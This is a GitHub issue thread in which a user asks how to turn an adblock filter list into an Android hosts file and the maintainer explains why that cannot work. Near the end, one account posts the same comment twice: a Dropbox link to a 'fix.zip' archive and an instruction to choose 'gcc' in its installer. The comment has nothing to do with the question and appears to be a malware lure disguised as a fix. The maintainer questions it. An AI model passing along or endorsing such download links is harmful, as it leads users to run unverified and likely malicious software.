### ISSUE TITLE
hosts file for android

### ISSUE THREAD

**Issue by Tripp1e** [bogachenko/fuckfuckadblock#505]
### Additional message

I would like to use this filterlist on my android device, also. Is there any way to convert it to a hosts list and use it with a service like AdAway

**Comment by bogachenko** [comment]
No, and to be honest, there’s no point in doing that. Websites (almost all of them) don't rely solely on domains to track users. My list works through scriptlets that disable certain scripts or specific conditions within the scripts; this is cosmetic work. DNS blocking, on the other hand, is more of a blunt tool designed for different purposes. Converting a list that blocks scripts and actions within those scripts into a syntax for DNS blocking is physically impossible, and by the way, [this](https://github.com/bogachenko/fuckfuckadblock/issues/399) question has already come up before.

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by bogachenko** [comment]
@Diganta-18 I'm sorry, what is this? if you have a problem with this site then open a ticket
